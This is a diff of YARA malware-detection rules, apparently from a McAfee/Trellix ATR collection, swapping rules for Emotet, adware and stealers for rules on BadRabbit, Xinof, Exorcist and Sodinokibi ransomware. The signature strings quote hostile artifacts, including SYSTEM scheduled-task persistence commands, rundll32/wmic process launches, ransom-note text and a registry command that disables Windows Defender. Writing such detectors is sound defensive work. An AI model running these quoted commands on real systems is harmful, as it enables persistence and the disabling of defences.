 		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_emotet.yar#L1-L32"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_BadRabbit.yar#L3-L47"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "223e4453a6c3b56b0bc0f91147fa55ea59582d64b8a5c08f1f8d06026044065e"
+		logic_hash = "2879b8dc1ca0e86253354ac24b56d950878b23215b503da9b1d5faabd2c4bf9d"
 		score = 75
-		quality = 70
-		tags = "FINANCIAL, FILE"
+		quality = 45
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "financial"
-		malware_family = "Backdoor:W32/Emotet"
-		actor_type = "Cybercrime"
-		hash1 = "a6621c093047446e0e8ae104769af93a5a8ed147ab8865afaafbbd22adbd052d"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/BadRabbit"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93"
 
 	strings:
-		$pattern_0 = { 8b45fc 8be5 5d c3 55 8bec }
-		$pattern_1 = { 3c39 7e13 3c61 7c04 3c7a 7e0b 3c41 }
-		$pattern_2 = { 7c04 3c39 7e13 3c61 7c04 3c7a 7e0b }
-		$pattern_3 = { 5f 8bc6 5e 5b 8be5 }
-		$pattern_4 = { 5f 668906 5e 5b }
-		$pattern_5 = { 3c30 7c04 3c39 7e13 3c61 7c04 }
-		$pattern_6 = { 53 56 57 8bfa 8bf1 }
-		$pattern_7 = { 3c39 7e13 3c61 7c04 3c7a 7e0b }
-		$pattern_8 = { 55 8bec 83ec14 53 }
-		$pattern_9 = { 5e 8be5 5d c3 55 8bec }
+		$x1 = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" fullword wide
+		$x2 = "need to do is submit the payment and get the decryption password." fullword ascii
+		$s3 = "If you have already got the password, please enter it below." fullword ascii
+		$s4 = "dispci.exe" fullword wide
+		$s5 = "\\\\.\\GLOBALROOT\\ArcName\\multi(0)disk(0)rdisk(0)partition(1)" fullword wide
+		$s6 = "Run DECRYPT app at your desktop after system boot" fullword ascii
+		$s7 = "Enter password#1: " fullword wide
+		$s8 = "Enter password#2: " fullword wide
+		$s9 = "C:\\Windows\\cscc.dat" fullword wide
+		$s10 = "schtasks /Delete /F /TN %ws" fullword wide
+		$s11 = "Password#1: " fullword ascii
+		$s12 = "\\AppData" fullword wide
+		$s13 = "Disk decryption completed" fullword wide
+		$s14 = "Files decryption completed" fullword wide
+		$s15 = "http://diskcryptor.net/" fullword wide
+		$s16 = "Your personal installation key#1:" fullword ascii
+		$s17 = ".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg." wide
+		$s18 = "Disable your anti-virus and anti-malware programs" fullword wide
+		$s19 = "bootable partition not mounted" fullword ascii
 
 	condition:
-		7 of them and filesize < 180224
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and pe.imphash ( ) == "94f57453c539227031b918edd52fc7f1" and ( 1 of ( $x* ) or 4 of them ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Malw_Browser_Fox_Adware : ADWARE FILE
+rule TRELLIX_ARC_Badrabbit_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Browser Fox Adware based on the PDB reference"
+		description = "Rule to detect Bad Rabbit Ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "67d20c3a-4e9d-5fbf-b26a-d7b5fb270d12"
-		date = "2015-01-15"
+		id = "d6e78c14-0913-5eed-be15-a6d1a8cd1a8d"
+		date = "2025-06-01"
 		modified = "2020-08-14"
-		reference = "https://www.sophos.com/en-us/threat-center/threat-analyses/adware-and-puas/Browse%20Fox.aspx"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_browser_fox_adware.yar#L1-L25"
+		reference = "https://securelist.com/bad-rabbit-ransomware/82851/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_BadRabbit.yar#L49-L101"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "c6f3d6024339940896dd18f32064c0773d51f0261ecbee8b0534fdd9a149ac64"
-		logic_hash = "462a05de46ec0d710cac80a05d4935279a43f49cbd5ef49c072f277982a76fce"
+		logic_hash = "7536f021ce7fede0f1a2bf2f4ebc7d6e7269a6dd63005cab1fc6a309a71c61c0"
 		score = 75
-		quality = 70
-		tags = "ADWARE, FILE"
-		rule_version = "v1"
-		malware_type = "adware"
-		malware_family = "Adware:W32/BrowserFox"
+		quality = 43
+		tags = "RANSOMWARE, FILE"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/BadRabbit"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\Utilities\\130ijkfv.o4g\\Desktop\\Desktop.OptChecker\\bin\\Release\\ BooZaka.Opt"
+		$s1 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"%ws /C Start \\\"\\\" \\\"%wsdispci.exe\\\" -id %u && exit\"" fullword wide
+		$s2 = "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\" fullword wide
+		$s3 = "process call create \"C:\\Windows\\System32\\rundll32.exe" fullword wide
+		$s4 = "need to do is submit the payment and get the decryption password." fullword wide
+		$s5 = "schtasks /Create /SC once /TN drogon /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" fullword wide
+		$s6 = "rundll32 %s,#2 %s" fullword ascii
+		$s7 = " \\\"C:\\Windows\\%s\\\" #1 " fullword wide
+		$s8 = "Readme.txt" fullword wide
+		$s9 = "wbem\\wmic.exe" fullword wide
+		$s10 = "SYSTEM\\CurrentControlSet\\services\\%ws" fullword wide
+		$og1 = { 39 74 24 34 74 0a 39 74 24 20 0f 84 9f }
+		$og2 = { 74 0c c7 46 18 98 dd 00 10 e9 34 f0 ff ff 8b 43 }
+		$og3 = { 8b 3d 34 d0 00 10 8d 44 24 28 50 6a 04 8d 44 24 }
+		$oh1 = { 39 5d fc 0f 84 03 01 00 00 89 45 c8 6a 34 8d 45 }
+		$oh2 = { e8 14 13 00 00 b8 ff ff ff 7f eb 5b 8b 4d 0c 85 }
+		$oh3 = { e8 7b ec ff ff 59 59 8b 75 08 8d 34 f5 48 b9 40 }
+		$oj4 = { e8 30 14 00 00 b8 ff ff ff 7f 48 83 c4 28 c3 48 }
+		$oj5 = { ff d0 48 89 45 e0 48 85 c0 0f 84 68 ff ff ff 4c }
+		$oj6 = { 85 db 75 09 48 8b 0e ff 15 34 8f 00 00 48 8b 6c }
+		$ok1 = { 74 0c c7 46 18 c8 4a 40 00 e9 34 f0 ff ff 8b 43 }
+		$ok2 = { 68 f8 6c 40 00 8d 95 e4 f9 ff ff 52 ff 15 34 40 }
+		$ok3 = { e9 ef 05 00 00 6a 10 58 3b f8 73 30 8b 45 f8 85 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( all of ( $s* ) and all of ( $og* ) ) or all of ( $oh* ) or all of ( $oj* ) or all of ( $ok* )
 }
-rule TRELLIX_ARC_Masslogger_Stealer : STEALER FILE
+rule TRELLIX_ARC_Ransom_Xinof : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect unpacked MassLogger stealer"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "c3a40108-3f0c-5949-9201-95c3c38b352a"
-		date = "2020-07-02"
-		modified = "2020-08-14"
-		reference = "https://urlhaus.abuse.ch/browse/signature/MassLogger/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_masslogger_stealer.yar#L1-L63"
+		description = "Detect Xinof ransomware"
+		author = "Thomas Roccia | McAfee ATR team"
+		id = "3b064ce4-cd5b-5a4a-bb55-a2c2c361791e"
+		date = "2020-11-20"
+		modified = "2020-11-20"
+		reference = "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_xinof.yar#L53-L82"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "343873155b6950386f7d9bcd8d2b2e81088521aedf8ff1333d20229426d8145c"
-		logic_hash = "476b3f3a54a4616058a2aef01adbe429a38eacc8ee58881d31bd28e795a27575"
+		hash = "0c1e6299a2392239dbe7fead33ef4146"
+		logic_hash = "42110ee8869d56c53dc201cbc83652c6457541b8d502aa12b37ef6200e735a15"
 		score = 75
-		quality = 66
-		tags = "STEALER, FILE"
+		quality = 70
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "stealer"
-		malware_family = "Stealer:W32/MassLogger"
+		malware_type = "ransomware"
+		malware_family = "Ransom/XINOF"
 		actor_type = "Cybercrime"
-		actor_group = "Unknown"
+		actor_group = "FONIX"
 
 	strings:
-		$pattern_0 = { 6437 3e2585829c88 ec ec 1bc8 }
-		$pattern_1 = { d7 b9513e1ba7 195ab6 e6df 7e2a 5a b6cc }
-		$pattern_2 = { 80aee281aae280 8ee2 808ce2808ee2808e e280 ae 00436f 6e }
-		$pattern_3 = { 6d e586 4c 40 }
-		$pattern_4 = { e281 ab e280 8ee2 80aee281aae280 8ee2 }
-		$pattern_5 = { 6c 69636b65644576 656e 7441 7267 7300 }
-		$pattern_6 = { 6e 7e81 d86aaf 61 93 7c2b 832b62 }
-		$pattern_7 = { 8b1c87 e7ed 24a2 3218 73df 53 }
-		$pattern_8 = { ee 9a357f9a475399 3188eef97d50 3f ef c9 }
-		$pattern_9 = { 44 a2???????? 92 7526 42 208fb5ca7050 }
-		$pattern_10 = { f2bbafb0d5f8 d524 0d48c906ba 7977 5d }
-		$pattern_11 = { 748f 46 4e 49 2af2 ee 9a357f9a475399 }
-		$pattern_12 = { 237ddb e200 95 46 99 37 }
-		$pattern_13 = { d9ae1d19ec3b 01db c5615c ec }
-		$pattern_14 = { 304a8a e2f4 bde7a84f79 c038d3 197ceae6 }
-		$pattern_15 = { 291f ff84c3bd55d8dc f331f2 1a3a 9c 7d78 }
-		$pattern_16 = { 3f 7af1 77a2 24ae 7ff3 }
-		$pattern_17 = { d1655d 7236 3873c1 b59e }
-		$pattern_18 = { 2aff 95 55 28ff 94 53 }
-		$pattern_19 = { e6b1 43 08d2 ef 43 3c38 }
-		$pattern_20 = { 6964427275736800 43 6f 6c 6f 7200 e281 }
-		$pattern_21 = { 37 005400a7 877f08 54 00e1 875303 5c }
-		$pattern_22 = { 6a45 e42c d3ba76c4f058 ce 3037 }
-		$pattern_23 = { b59e 59 f1 f1 }
-		$pattern_24 = { 7988 cd09 91 0099664e0391 008288490061 008c88d3099900 }
-		$pattern_25 = { 1e e3c2 00ff 698876be8fb365b13eb7 45 }
-		$pattern_26 = { 3d4c9deadf 57 ddeb 97 }
-		$pattern_27 = { e280 8ee2 808ee281aee280 8ee2 81ace281ace280ade280ab e281 }
-		$pattern_28 = { 4d 9c 8e5753 32414f d28a7173e2c4 7ee4 d9ae1d19ec3b }
-		$pattern_29 = { 7472 69704d656e755f 53 61 }
-		$pattern_30 = { 79bc fa ad 49 }
-		$pattern_31 = { 875303 5c 00140a 37 005c00a7 }
-		$pattern_32 = { 7265 5f 43 6c 69636b00746f6f 6c 53 }
-		$pattern_33 = { 36e633 2b2b 3673d1 d480 124d2d }
-		$pattern_34 = { 19b3e7ab29db 51 e1f3 dd3a 266f b884c4b53b }
-		$pattern_35 = { 7467 43 f332d2 84bf3df2e66b 4a ba5a20d9f5 3dbf2a3753 }
-		$pattern_36 = { f271f3 8877f7 a8e5 6437 3e2585829c88 }
-		$pattern_37 = { ce 84604c 3f 8cc6 56 bf165fdec5 4a }
-		$pattern_38 = { ad 49 a2???????? 4c e15b 8b1c87 }
-		$pattern_39 = { 3400 b687 bc083c00cd 87ce 083400 }
+		$s1 = "XINOF.exe" nocase ascii
+		$s2 = "C:\\Users\\Phoenix" nocase ascii
+		$s3 = "How To Decrypt Files.hta" nocase ascii
+		$s4 = "C:\\ProgramData\\norunanyway" nocase ascii
+		$s5 = "C:\\ProgramData\\clast" nocase ascii
+		$s6 = "fonix1" nocase ascii
+		$s7 = "C:\\Windows\\System32\\shatdown.exe" nocase ascii
+		$s8 = "XINOF Ransomw" nocase ascii
+		$s9 = "XINOF v4.2" nocase ascii
+		$s10 = "XINOF Ransomware Version 3.3" nocase ascii
 
 	condition:
-		7 of them and filesize < 3834880
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 5 of ( $s* ) or TRELLIX_ARC_Ransom_Xinof_Chunk_PRIVATE
 }
-rule TRELLIX_ARC_Rtf_Bluetea_Builder : MALDOC FILE
+rule TRELLIX_ARC_RANSOM_Exorcist : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the RTF files created to distribute BlueTea trojan"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "20e4f7b2-b36c-5724-a3aa-4216ed6265ab"
-		date = "2020-04-21"
-		modified = "2020-08-14"
-		reference = "https://blog.360totalsecurity.com/en/bluetea-action-drive-the-life-trojan-update-email-worm-module-and-spread-through-covid-19-outbreak/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALDOC_rtf_bluetea_builder.yar#L1-L30"
+		description = "Rule to detect Exorcist"
+		author = "McAfee ATR Team"
+		id = "38ab069d-b030-5459-a42f-7ecd5963e68f"
+		date = "2020-09-01"
+		modified = "2020-10-12"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Exorcist.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "4a3eeaed22342967a95302a4f087b25f50d61314facc6791f756dcd113d4f277"
-		logic_hash = "6c4007fb7ef4819141db63050215dcbb3d2c17e7cdcdbb6cfb4f4b045bb5736b"
+		logic_hash = "c376382e60aae0f661151495097d3d93f185faebb11781dbf083324c23a07247"
 		score = 75
 		quality = 70
-		tags = "MALDOC, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "maldoc"
-		malware_family = "Maldoc:W32/BlueTea"
+		malware_type = "ransomware"
+		malware_family = "Ransomware:W32/Exorcist"
+		actor_type = "Cybercrime"
+		hash1 = "793dcc731fa2c6f7406fd52c7ac43926ac23e39badce09677128cce0192e19b0"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$sequence = { 7B??72??6631??????65666C616E6731??32??????????69??????????????67????36??75??32??????656666????35????????656666????????73??666462????33??35????????74??68????????68????????36??73??73??66??????68????????36??73??73??6662????5C646566??616E6731??33??5C646566??616E67666532??35????????656D656C616E6731??33??5C74??656D656C616E67666532??35????????656D656C616E6763????7B??666F6E74??62??????6630??????69??????????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????0A????6631??5C6662????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??5C6633????6662????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??34??35????????30????3630??30??30????????????72??6120????74??3B????0A????6633??5C6662????69??????????69????????????6172??6574??5C6670??71??7B??2A??????6E6F73??20??32??6630??????????30??30????33??32??34??43616C69????????????5C6633??5C6662????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??5C2763????2763????2763????276535????????7B??666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C666462????6A??72??6633??35????????62????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??34??35????????30????3630??30??30????????????72??613B????5C6662????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????0A????666C6F6D69????????????31??????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C666462????6E6F72??6633??35????????62????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??0A????66??????69????????????31??????????62????69??????????69????????????6172??6574??5C6670??71??7B??2A??????6E6F73??20??32??6630??????????30??30????33??32??34??43616C69????????????5C6662????69????????????31??????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C6634??5C6662????69??????????6D616E5C6663????72??6574??33??5C6670??71??20??????6573??4E6577??526F6D616E20????3B????0A????6634??5C6662????69??????????6D616E5C6663????72??6574??30????6670??71??20??????6573??4E6577??526F6D616E20????72??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??3631??????72??32??5469????????????77??526F6D616E20????6565??????7B??6634??5C6662????69??????????6D616E5C6663????72??6574??3632??????72??32??5469????????????77??526F6D616E20??????3B????5C6634??5C6662????69??????????6D616E5C6663????72??6574??37375C6670??71??20??????6573??4E6577??526F6D616E20??486562????77??3B????0A????6634??5C6662????69??????????6D616E5C6663????72??6574??3738??????72??32??5469????????????77??526F6D616E20??4172??62????29??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??38??5C6670??71??20??????6573??4E6577??526F6D616E20????6C74??63??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??3633??????72??32??5469????????????77??526F6D616E20??5669????????????73??29??7D??0A????6631??32??????69??????????????6C5C6663????72??6574??5C6670??71??20????6D5375??20????73??6572??7B??2A??????6C74??5369????????????7D??5C6633??30??????69??????????????6D616E5C6663????72??6574??33??5C6670??71??20????6D62????6120????74??20????3B????5C6633??31??????69??????????????6D616E5C6663????72??6574??30????6670??71??20????6D62????6120????74??20????72??7D??5C6633??33??????69??????????????6D616E5C6663????72??6574??3631??????72??32??43616D62????6120????74??20????6565??????0D????????33??34??6662????69??????????6D616E5C6663????72??6574??3632??????72??32??43616D62????6120????74??20??????3B????5C6633??375C6662????69??????????6D616E5C6663????72??6574??38??5C6670??71??20????6D62????6120????74??20????6C74??63??7D??5C6633??38??????69??????????????6D616E5C6663????72??6574??3633??????72??32??43616D62????6120????74??20??5669????????????73??29??7D??5C6634??30??????69??????????????69????????????6172??6574??33??5C6670??71??20????6C69????????????3B????0A????6634??31??????69??????????????69????????????6172??6574??30????6670??71??20????6C69????????????72??7D??5C6634??33??????69??????????????69????????????6172??6574??3631??????72??32??43616C69????????????6565??????7B??6634??34??6662????69??????????69????????????6172??6574??3632??????72??32??43616C69????????????72??7D??5C6634??375C6662????69??????????69????????????6172??6574??38??5C6670??71??20????6C69????????????6C74??63??7D??0A????6634??38??????69??????????????69????????????6172??6574??3633??????72??32??43616C69????????????69????????????73??29??7D??5C6634??32??????69??????????????6C5C6663????72??6574??5C6670??71??20????2763????2763????2763????276535????????74??72??3B????5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??33??5C6670??71??20??????6573??4E6577??526F6D616E20????3B????0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??30????6670??71??20??????6573??4E6577??526F6D616E20????72??7D??5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3631??????72??32??5469????????????77??526F6D616E20????6565??????7B??666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3632??????72??32??5469????????????77??526F6D616E20??????3B????0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??37375C6670??71??20??????6573??4E6577??526F6D616E20??486562????77??3B????5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3738??????72??32??5469????????????77??526F6D616E20??4172??62????29??7D??5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??38??5C6670??71??20??????6573??4E6577??526F6D616E20????6C74??63??7D??0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3633??????72??32??5469????????????77??526F6D616E20??5669????????????73??29??7D??5C666462????6A??72??6633??35????????62????69??????????6C5C6663????72??6574??5C6670??71??20????6D5375??20????73??6572??7B??2A??????6C74??5369????????????7D??5C66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??33??5C6670??71??20????6D62????6120????3B????0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??30????6670??71??20????6D62????6120????72??7D??5C66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3631??????72??32??43616D62????6120????6565??????7B??66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3632??????72??32??43616D62????6120??????3B????0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??38??5C6670??71??20????6D62????6120????6C74??63??7D??5C66??????616A?? }
+		$sq1 = { 48 8B C4 48 89 58 08 48 89 70 10 48 89 78 18 4C 89 60 20 55 41 56 41 57 48 8D 68 A1 48 81 EC 90 00 00 00 49 8B F1 49 8B F8 4C 8B FA 48 8B D9 E8 ?? ?? ?? ?? 45 33 E4 85 C0 0F 85 B1 00 00 00 48 8B D7 48 8B CB E8 9E 02 00 00 85 C0 0F 85 9E 00 00 00 33 D2 48 8B CB E8 ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 45 8D 44 24 01 48 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 8B D0 48 8B CB 48 8B F8 FF 15 ?? ?? ?? ?? 4C 89 64 24 30 45 33 C9 C7 44 24 28 80 00 00 E8 45 33 C0 BA 00 00 00 C0 C7 44 24 20 03 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 4C 8B F0 48 8D 48 FF 48 83 F9 FD 77 25 48 8D 55 2F 48 8B C8 FF 15 ?? ?? ?? ?? 4C 39 65 2F 75 3B 49 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 4C 8D 9C 24 90 00 00 00 49 8B 5B 20 49 8B 73 28 49 8B 7B 30 4D 8B 63 38 49 8B E3 41 5F 41 5E 5D C3 48 8D 45 FB 4C 89 65 1F 4C 8D 4D FF 48 89 44 24 20 4C 8B C6 4C 89 65 07 48 8D 55 07 4C 89 65 FF 48 8D 4D 1F 44 89 65 FB E8 ?? ?? ?? ?? 45 33 C9 4C 8D 05 3C F5 FF FF 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 48 8D 55 17 49 8B CE FF 15 ?? ?? ?? ?? 49 8B CE 44 89 65 F7 E8 ?? ?? ?? ?? 49 8B F4 4C 89 65 0F 4C 39 65 17 0F 8E 9D 00 00 00 C1 E0 10 44 8B F8 F0 FF 45 F7 B9 50 00 00 00 E8 ?? ?? ?? ?? 8B 4D 13 48 8B D8 89 48 14 89 70 10 4C 89 60 18 44 89 60 28 4C 89 70 30 48 8B 4D 07 48 89 48 48 48 8D 45 F7 B9 00 00 01 00 48 89 43 40 E8 ?? ?? ?? ?? 33 D2 48 89 43 20 41 B8 00 00 01 00 48 8B C8 E8 ?? ?? ?? ?? 48 8B 53 20 4C 8D 4B 38 41 B8 00 00 01 00 48 89 5C 24 20 49 8B CE FF 15 ?? ?? ?? ?? EB 08 33 C9 FF 15 ?? ?? ?? ?? 8B 45 F7 3D E8 03 00 00 77 EE 49 03 F7 48 89 75 0F 48 3B 75 17 0F 8C 6B FF FF FF EB 03 8B 45 F7 85 C0 74 0E 33 C9 FF 15 ?? ?? ?? ?? 44 39 65 F7 77 F2 48 8B 4D 07 E8 ?? ?? ?? ?? 48 8B 4D 1F 33 D2 E8 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 4C 89 64 24 30 45 33 C9 C7 44 24 28 80 00 00 00 45 33 C0 BA 00 00 00 C0 C7 44 24 20 03 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 48 8B D8 48 8D 48 FF 48 83 F9 FD 77 51 48 8D 55 37 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B 55 37 45 33 C9 45 33 C0 48 8B CB FF 15 ?? ?? ?? ?? 44 8B 45 FB 4C 8D 4D 27 48 8B 55 FF 48 8B CB 4C 89 64 24 20 FF 15 ?? ?? ?? ?? 48 8B 4D FF E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? E9 14 FE FF FF 48 8B CF E8 ?? ?? ?? ?? 48 8B 4D FF E9 06 FE FF FF }
+		$sq2 = { 48 8B C4 48 81 EC 38 01 00 00 48 8D 50 08 C7 40 08 04 01 00 00 48 8D 4C 24 20 FF 15 ?? ?? ?? ?? 48 8D 4C 24 20 E8 ?? ?? ?? ?? 48 81 C4 38 01 00 00 C3 }
 
 	condition:
-		uint16( 0 ) == 0x5c7b and filesize < 100KB and all of them
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule TRELLIX_ARC_Screenlocker_5H311_1Nj3C706 : SCREENLOCKER FILE
+
+rule TRELLIX_ARC_Ransomware_Sodinokibi : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the screenlocker 5h311_1nj3c706"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "50bbe8e1-4721-5277-b786-d2a2d9acf917"
-		date = "2018-08-07"
-		modified = "2020-08-14"
-		reference = "https://twitter.com/demonslay335/status/1038060120461266944"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_screenlocker_5h311_1nj3c706.yar#L1-L33"
+		description = "Using a recently disclosed vulnerability in Oracle WebLogic, criminals use it to install a new variant of ransomware called “Sodinokibi"
+		author = "Christiaan Beek | McAfee ATR team"
+		id = "573e3390-1ee5-5489-a67e-decc02aea7a0"
+		date = "2019-05-13"
+		modified = "2025-03-18"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Sodinokibi.yar#L3-L30"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "016ee638bd4fccd5ca438c2e0abddc4b070f59269c08f11c5313ba9c37190718"
-		logic_hash = "61b4495841c77053ba2631f087197719f3ee45cd93add022f23b87ece8563619"
+		logic_hash = "cb5d4e9a7cbec27d693ed73bab4be598614d7bd5ebd23d7907730571a4174be8"
 		score = 75
 		quality = 70
-		tags = "SCREENLOCKER, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "screenlocker"
-		malware_family = "ScreenLocker:W32/5h311_1nj3c706"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Sodinokibi"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash4 = "9b62f917afa1c1a61e3be0978c8692dac797dd67ce0e5fd2305cc7c6b5fef392"
 
 	strings:
-		$s1 = "C:\\Users\\Hoang Nam\\source\\repos\\WindowsApp22\\WindowsApp22\\obj\\Debug\\WindowsApp22.pdb" fullword ascii
-		$s2 = "cmd.exe /cREG add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\ActiveDesktop /v NoChangingWallPaper /t REG_DWOR" wide
-		$s3 = "C:\\Users\\file1.txt" fullword wide
-		$s4 = "C:\\Users\\file2.txt" fullword wide
-		$s5 = "C:\\Users\\file.txt" fullword wide
-		$s6 = " /v Wallpaper /t REG_SZ /d %temp%\\IMG.jpg /f" fullword wide
-		$s7 = " /v DisableAntiSpyware /t REG_DWORD /d 1 /f" fullword wide
-		$s8 = "All your file has been locked. You must pay money to have a key." fullword wide
-		$s9 = "After we receive Bitcoin from you. We will send key to your email." fullword wide
+		$x1 = "sodinokibi.exe" fullword wide
+		$y0 = { 8d 85 6c ff ff ff 50 53 50 e8 62 82 00 00 83 c4 }
+		$y1 = { e8 24 ea ff ff ff 75 08 8b ce e8 61 fc ff ff 8b }
+		$y2 = { e8 01 64 ff ff ff b6 b0 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
